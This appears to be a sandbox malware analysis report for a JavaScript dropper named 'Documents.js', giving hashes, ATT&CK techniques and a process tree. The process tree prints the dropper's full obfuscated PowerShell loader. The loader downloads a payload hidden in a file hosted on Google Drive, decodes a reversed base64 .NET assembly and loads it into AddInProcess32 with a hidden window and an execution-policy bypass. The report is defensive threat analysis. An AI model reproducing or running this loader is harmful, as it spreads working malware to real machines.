dcc3574ccccae25ee8c2b6940853fd92cac81435a02f3524fb2b697af3c6165f

General

Target

Documents.js
Size

400.0MB
MD5

647813cf3cca40181f8330cec1ee80df
SHA1

ca602c6199ffe426328e277a05dc849a574be41b
SHA256

1f75d59616e804ffbe35de4e67a33db2c58c55da59d4302f818a53f4d6d1b9c9
SHA512

acf4bb9d182f41185a86c36c630d273716041f974c6cf5c36dae4ebfe434369220474f38c483cdfbac6f8171980931f976330ee8d9be7d76c2976f5b45becbc8
SSDEEP

3072:kE2dapfO3R9u2rWy5ei4uzUuHUdTxcE2dapfO3R9u2rWy5e:kE5pkbuK8ErkcE5pkbuK8

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2788	powershell.exe
7	2788	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2788	powershell.exe
2868	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2868	powershell.exe
2788	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1668 wrote to memory of 2868	1668	wscript.exe	31
PID 1668 wrote to memory of 2868	1668	wscript.exe	31
PID 1668 wrote to memory of 2868	1668	wscript.exe	31
PID 2868 wrote to memory of 2788	2868	powershell.exe	33
PID 2868 wrote to memory of 2788	2868	powershell.exe	33
PID 2868 wrote to memory of 2788	2868	powershell.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Documents.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAbABXAEcAaQBtAGEAZwBlACcAKwAnAFUAcgBsACAAPQAgAEcAVgBLAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4ACcAKwAnAHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAEEASQBWAGcASgBKAEoAdgAxAEYANgB2AFMANABzAFUATwB5AGIAbgBIAC0AcwBEAHYAVQBoAEIAWQB3AHUAcgAgAEcAVgBLADsAbABXAEcAdwBlAGIAJwArACcAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagAnACsAJwBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AGwAVwBHAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAbABXACcAKwAnAEcAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAGwAVwBHAGkAbQBhAGcAJwArACcAZQBVAHIAbAApADsAbABXAEcAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAbABXAEcAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAbABXAEcAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAARwBWAEsAPAA8AEIAJwArACcAQQAnACsAJwBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBHAFYASwA7AGwAVwBHAGUAbgBkAEYAbABhAGcAIAA9ACAARwBWAEsAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AEcAVgBLADsAbABXAEcAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIABsAFcARwBpACcAKwAnAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABsAFcARwBzAHQAYQByAHQARgBsACcAKwAnAGEAZwApADsAbABXAEcAZQBuAGQASQBuAGQAZQB4ACAAPQAgAGwAVwBHAGkAbQBhAGcAZQAnACsAJwBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAGwAVwBHAGUAbgBkAEYAbABhAGcAKQA7AGwAVwBHAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAbABXAEcAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIABsAFcARwBzAHQAYQByAHQASQBuAGQAZQB4ADsAbABXAEcAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAGwAVwBHAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBsAFcARwBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABsAFcARwBlAG4AZABJAG4AZABlAHgAIAAtACAAbABXAEcAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGwAVwBHAGIAYQBzAGUAJwArACcANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAbABXAEcAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpACcAKwAnAG4AZwAoAGwAVwBHAHMAdABhAHIAdABJAG4AZABlAHgALAAgAGwAVwBHAGIAYQBzAGUAJwArACcANgA0ACcAKwAnAEwAZQBuAGcAdABoACkAOwBsAFcARwBiAGEAcwBlADYANABSACcAKwAnAGUAdgBlAHIAcwAnACsAJwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABsAFcARwAnACsAJwBiAGEAcwBlADYAJwArACcANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAgAEgAegBhACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAGwAVwBHAF8AIAB9ACkAWwAtADEALgAuAC0AKABsAFcARwBiAGEAJwArACcAcwBlADYANABDAG8AbQBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsAbABXAEcAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AJwArACcAZwAoAGwAVwBHACcAKwAnAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAApADsAbABXAEcAbABvAGEAZABlACcAKwAnAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABsAFcARwBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAbABXAEcAdgBhAGkATQBlAHQAaABvAGQAJwArACcAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKwAnAF0ALgBHAGUAdABNAGUAdABoAG8AJwArACcAZAAoAEcAVgBLAFYAJwArACcAQQBJAEcAVgBLACkAOwBsAFcARwB2AGEAaQBNAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAbABXAEcAbgB1AGwAbAAsACAAQAAoAEcAVgBLADQAMQBjAGQANgBhADIAYgBmAGUAZQA4AC0AMAA5AGIAOAAtAGUANAAyADQALQBkADIAZgAzAC0AMQAzADYANwA1ADAAMAAwAD0AbgBlAGsAbwB0ACYAYQBpAGQAZQBtAD0AdABsAGEAPwB0AHgAdAAuADQAMgAwADIAMAAxADYAJwArACcAMAAyADkAMAA4AG0AcgBvAHcAeABuACcAKwAnAGgAbwBqAC8AbwAvAG0AbwBjAC4AdABvAHAAJwArACcAcwBwAHAAYQAuADQAMgAwADIAcwB0AHAAeQByAGMAJwArACcALwBiAC8AMAB2AC8AbQBvAGMALgBzAGkAcABhAGUAbABnAG8AbwBnAC4AZQBnAGEAcgBvAHQAcwBlAHMAYQBiAGUAcgBpAGYALwAvADoAcwBwACcAKwAnAHQAdABoAEcAVgAnACsAJwBLACwAIABHAFYASwBkAGUAcwBhAHQAaQB2AGEAZABvAEcAVgBLACwAJwArACcAIABHAFYASwBkAGUAcwBhAHQAaQB2AGEAZABvAEcAVgBLACwAIABHAFYASwBkACcAKwAnAGUAcwBhAHQAaQB2AGEAZABvAEcAVgBLACcAKwAnACwAIABHAFYASwBBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIARwBWAEsALAAgAEcAVgBLAGQAZQBzAGEAdABpAHYAYQBkAG8ARwBWAEsALAAgAEcAVgBLAGQAZQBzAGEAdABpAHYAYQBkAG8ARwBWAEsALABHAFYASwBkAGUAcwBhAHQAaQB2AGEAZABvAEcAVgBLACwARwBWAEsAZABlAHMAYQAnACsAJwB0AGkAdgBhAGQAbwAnACsAJwBHAFYASwAsAEcAVgBLAGQAZQBzAGEAdABpAHYAYQBkAG8ARwBWAEsALABHAFYASwBkAGUAcwBhAHQAaQB2ACcAKwAnAGEAZABvAEcAVgAnACsAJwBLACwARwBWAEsAZABlAHMAYQB0AGkAdgBhAGQAbwBHAFYASwAsAEcAVgBLADEARwBWAEsALABHAFYASwBkAGUAcwBhAHQAaQB2AGEAZABvAEcAVgBLACkAKQAnACsAJwA7ACcAKQAtAGMAUgBlAFAAbABBAEMARQAgACAAJwBIAHoAYQAnACwAWwBDAGgAQQByAF0AMQAyADQAIAAtAHIAZQBQAGwAYQBjAEUAIAAgACcARwBWAEsAJwAsAFsAQwBoAEEAcgBdADMAOQAgAC0AYwBSAGUAUABsAEEAQwBFACcAbABXAEcAJwAsAFsAQwBoAEEAcgBdADMANgApAHwAIABpAG4AVgBPAGsAZQAtAEUAeABQAHIARQBzAHMAaQBvAE4A';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('lWGimage'+'Url = GVKhttps://drive.google.com/uc?ex'+'port=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur GVK;lWGweb'+'Client = New-Obj'+'ect System.Net.WebClient;lWGimageBytes = lW'+'GwebClient.DownloadData(lWGimag'+'eUrl);lWGimageText = [System.Text.Encoding]::UTF8.GetString(lWGimageBytes);lWGstartFlag = GVK<<B'+'A'+'SE64_START>>GVK;lWGendFlag = GVK<<BASE64_END>>GVK;lWGstartIndex = lWGi'+'mageText.IndexOf(lWGstartFl'+'ag);lWGendIndex = lWGimage'+'Text.IndexOf(lWGendFlag);lWGstartIndex -ge 0 -and lWGendIndex -gt lWGstartIndex;lWGstartIndex += lWGstartFlag.Length;lWGbase64Length = lWGendIndex - lWGstartIndex;lWGbase'+'64Command = lWGimageText.Substri'+'ng(lWGstartIndex, lWGbase'+'64'+'Length);lWGbase64R'+'evers'+'ed = -join (lWG'+'base6'+'4Command.ToCharArray() Hza ForEach-Object { lWG_ })[-1..-(lWGba'+'se64Command.Length)];lWGcommandBytes = [System.Convert]::FromBase64Strin'+'g(lWG'+'base64Reversed);lWGloade'+'dAssembly = [System.Reflection.Assembly]::Load(lWGcommandBytes);lWGvaiMethod'+' = [dnlib.IO.Home'+'].GetMetho'+'d(GVKV'+'AIGVK);lWGvaiMethod.Invoke(lWGnull, @(GVK41cd6a2bfee8-09b8-e424-d2f3-13675000=nekot&aidem=tla?txt.4202016'+'02908mrowxn'+'hoj/o/moc.top'+'sppa.4202stpyrc'+'/b/0v/moc.sipaelgoog.egarotsesaberif//:sp'+'tthGV'+'K, GVKdesativadoGVK,'+' GVKdesativadoGVK, GVKd'+'esativadoGVK'+', GVKAddInProcess32GVK, GVKdesativadoGVK, GVKdesativadoGVK,GVKdesativadoGVK,GVKdesa'+'tivado'+'GVK,GVKdesativadoGVK,GVKdesativ'+'adoGV'+'K,GVKdesativadoGVK,GVK1GVK,GVKdesativadoGVK))'+';')-cRePlACE 'Hza',[ChAr]124 -rePlacE 'GVK',[ChAr]39 -cRePlACE'lWG',[ChAr]36)| inVOke-ExPrEssioN"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
eaf63e3902ac126026130b0cb0cbdcf2

SHA1
c2ae734d7240781e4a6ce89467a636bea15fae01

SHA256
dd129218c8a9a56777749c104ea441bfb9e73381ebc733e4d157e02cbe7f13c8

SHA512
a3608db743893a10d21888c3e7d4dba7f4b260bac6b3732311c1ae9b5458d504b81e3106a5e3bdb67c0e542938baa63ce920f74146220ef3d44fa76cb91c067d

Download Submit
memory/2868-4-0x000007FEF615E000-0x000007FEF615F000-memory.dmp

Filesize
4KB

Download
memory/2868-5-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2868-6-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-7-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-8-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-9-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-10-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2868-11-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-17-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing